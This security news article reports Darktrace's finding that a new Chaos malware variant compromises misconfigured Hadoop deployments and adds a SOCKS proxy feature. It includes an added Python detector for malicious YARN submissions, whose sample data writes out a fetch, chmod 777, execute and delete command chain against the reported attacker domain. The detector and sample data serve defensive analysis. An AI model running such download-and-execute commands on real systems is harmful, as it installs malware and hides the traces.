Cybersecurity researchers have identified a new variant of the malware known as Chaos that is capable of compromising misconfigured cloud deployments, signalling an expansion of the botnet's target base beyond its usual infrastructure.
“Chaos malware is increasingly targeting misconfigured cloud deployments, moving beyond its traditional focus on routers and edge devices,” Darktrace said in a new report.
Chaos was first documented by Lumen Black Lotus Labs in September 2022, which described it as cross-platform malware targeting Windows and Linux environments to run remote shell commands, drop additional modules, propagate to other hosts using SSH keys, mine cryptocurrency, and launch distributed denial-of-service (DDoS) attacks via HTTP, TLS, TCP, UDP, and WebSocket.
The malware is believed to be an evolution of another DDoS malware known as Kaiji that targeted exposed, misconfigured Docker instances. It is not currently known who is behind the operation, but the presence of Chinese-language characters and the use of China-based infrastructure suggest that the threat actor may be of Chinese origin.
Darktrace said it identified the new variant last month when it targeted the company's honeypot network, which consists of intentionally misconfigured Hadoop instances that allow remote code execution on the service. In the attack observed by the cybersecurity company, the intrusion began with an HTTP request to a Hadoop deployment to create a new application.
The application, for its part, embeds a sequence of shell commands that retrieve the Chaos agent binary from an attacker-controlled server (“pan.tenire[.]com”), set permissions so that all users can read, modify, or run it (“chmod 777”), execute the binary, and then delete the artifact from disk to reduce the forensic trail.
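The submission-to-execution chain described above is something a defender can check for at the point where it enters the cluster. The following is an added example, not Darktrace's or the article's code: it pulls the container launch command out of a Hadoop application-submission body and correlates the download, permission change, execution and deletion stages on a single artifact, with the domain from the article as a known-bad indicator. It assumes the Hadoop service involved is the YARN ResourceManager REST API, where the launch command sits at am-container-spec.commands.command; the sample submissions, host names and file paths below are constructed for the example (the path on the attacker host is a placeholder).

```python
"""Flag Hadoop/YARN application submissions whose launch command follows the
download -> chmod 777 -> execute -> delete pattern.  Added example; assumes the
YARN ResourceManager REST submission layout (am-container-spec.commands.command).
All sample bodies are constructed, not captured data."""
import json
import re
import shlex


def refang(indicator):
    """Turn a defanged indicator (pan.tenire[.]com, hxxp://) back into a plain one."""
    return indicator.replace("[.]", ".").replace("hxxp", "http")


# Indicator reported in the article (printed there in defanged form).
KNOWN_BAD_HOSTS = {refang("pan.tenire[.]com")}

SPLIT_RE = re.compile(r"\s*(?:&&|\|\||;|\|)\s*")          # shell segment separators
URL_RE = re.compile(r"^https?://([A-Za-z0-9.-]+)(?::\d+)?(/\S*)?$")
LOOSE_MODE_RE = re.compile(r"0?777|[augo]*\+[rwxX]+")       # world-writable/executable modes


def _basename(path):
    return path.rstrip("/").rsplit("/", 1)[-1]


def _download_target(argv):
    """For a curl/wget segment return (host, local file name) or None."""
    tool, host, name = _basename(argv[0]), None, None
    i = 1
    while i < len(argv):
        tok = argv[i]
        m = URL_RE.match(tok)
        if m:
            host = m.group(1).lower()
            if name is None and m.group(2):
                name = _basename(m.group(2)) or None   # default: remote file name
        elif (tool, tok) in (("curl", "-o"), ("wget", "-O")) and i + 1 < len(argv):
            name = _basename(argv[i + 1])              # explicit output file name
            i += 1
        i += 1
    return (host, name) if host else None


def analyze_command(command):
    """Classify each shell segment and correlate the stages seen on one artifact."""
    seen, hosts = [], []
    downloaded, chmodded, executed, removed = set(), set(), set(), set()
    for seg in SPLIT_RE.split(command.strip()):
        try:
            argv = shlex.split(seg)
        except ValueError:            # unbalanced quotes: fall back to whitespace split
            argv = seg.split()
        if not argv:
            continue
        head = _basename(argv[0])
        if head in ("curl", "wget"):
            target = _download_target(argv)
            if target:
                hosts.append(target[0])
                if target[1]:
                    downloaded.add(target[1])
                seen.append("download")
        elif head == "chmod":
            args = [a for a in argv[1:] if not a.startswith("-")]
            if args and LOOSE_MODE_RE.fullmatch(args[0]):
                chmodded.update(_basename(a) for a in args[1:])
                seen.append("chmod")
        elif head == "rm":
            removed.update(_basename(a) for a in argv[1:] if not a.startswith("-"))
            seen.append("delete")
        else:
            # Execution of a file we saw downloaded (directly or via sh/bash), or any
            # absolute/relative path run as the command itself.
            ran = [_basename(a) for a in argv if _basename(a) in downloaded]
            if ran or argv[0].startswith(("./", "/")):
                executed.update(ran or [head])
                seen.append("execute")
    chain = downloaded & chmodded & executed & removed   # one file through all four stages
    ioc_hit = any(h in KNOWN_BAD_HOSTS for h in hosts)
    fetch_then_run = ("download" in seen and "execute" in seen
                      and seen.index("download") < seen.index("execute"))
    return {
        "stages": seen,
        "hosts": hosts,
        "ioc_hit": ioc_hit,
        "chained_artifacts": sorted(chain),
        "verdict": "high" if (chain or ioc_hit) else "medium" if fetch_then_run else "clean",
    }


def yarn_launch_commands(body):
    """Launch command(s) from a YARN application-submission body (assumed layout)."""
    cmd = body.get("am-container-spec", {}).get("commands", {}).get("command", [])
    return [cmd] if isinstance(cmd, str) else list(cmd)


def scan_submission(body):
    """Worst verdict across every launch command in the submission."""
    results = [analyze_command(c) for c in yarn_launch_commands(body)]
    order = {"clean": 0, "medium": 1, "high": 2}
    worst = max(results, key=lambda r: order[r["verdict"]], default=None)
    return {"application-name": body.get("application-name"),
            "verdict": worst["verdict"] if worst else "clean",
            "details": results}


# Constructed sample submissions.  The first mirrors the chain the article describes.
SAMPLES = [
    {"application-name": "health-check", "application-type": "YARN",
     "am-container-spec": {"commands": {"command":
         "curl -s http://pan.tenire.com/PLACEHOLDER_PATH -o /tmp/.x && chmod 777 /tmp/.x && /tmp/.x; rm -f /tmp/.x"}}},
    {"application-name": "wordcount", "application-type": "MAPREDUCE",
     "am-container-spec": {"commands": {"command":
         "java -Xmx512m -jar /opt/jobs/wordcount.jar input output"}}},
    {"application-name": "updater", "application-type": "YARN",
     "am-container-spec": {"commands": {"command":
         "wget -q http://files.example.net/tool -O /var/tmp/tool; sh /var/tmp/tool"}}},
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(json.dumps(scan_submission(sample), indent=2))
```

The verdict is deliberately tiered: a full download, chmod, run, delete sequence on one file, or any contact with the article's indicator, is high confidence, while a plain fetch-and-run from an unknown host is only medium, since legitimate jobs occasionally stage their own binaries. A normal `chmod 755` followed by execution is left clean, which keeps the rule from paging on ordinary job launches.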
An interesting aspect of the attack is that the domain was previously used in an email phishing campaign by the Chinese cybercrime group Silver Fox to distribute decoy documents and the ValleyRAT malware. That campaign was given the codename Operation Silk Lure by Seqrite Labs in October 2025.
The 64-bit ELF binary is a reorganized and updated version of Chaos that reworks many of its functions while retaining most of its core feature set. One of the more significant changes, however, is the removal of the functions that enabled it to spread via SSH and exploit router vulnerabilities.
These have been replaced by a new SOCKS proxy feature that allows compromised systems to be used to relay traffic, thereby hiding the true origin of malicious activity and making it harder for defenders to detect and stop the attack.
“In addition, several functions previously thought to be inherited from Kaiji have also been changed, suggesting that threat actors have either rewritten the malware or extensively repurposed it,” Darktrace said.
The addition of the proxy feature is likely a sign that the threat actors behind the malware want to further monetize the botnet beyond cryptocurrency mining and DDoS-for-hire, and keep up with their competitors in the cybercrime market by offering a diverse list of illegal services.
Darktrace concluded, “Although Chaos is not a new malware, its continued evolution highlights the dedication of cybercriminals to expanding their botnets and increasing the capabilities at their disposal.” “The recent addition of proxy services as core features in botnets like AISURU and Chaos shows that denial of service is no longer the only risk facing these botnet organizations and their security teams.”